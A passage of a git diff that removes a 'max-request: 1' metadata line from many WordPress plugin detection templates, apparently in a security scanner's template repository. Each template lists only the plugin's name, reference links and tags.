b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect 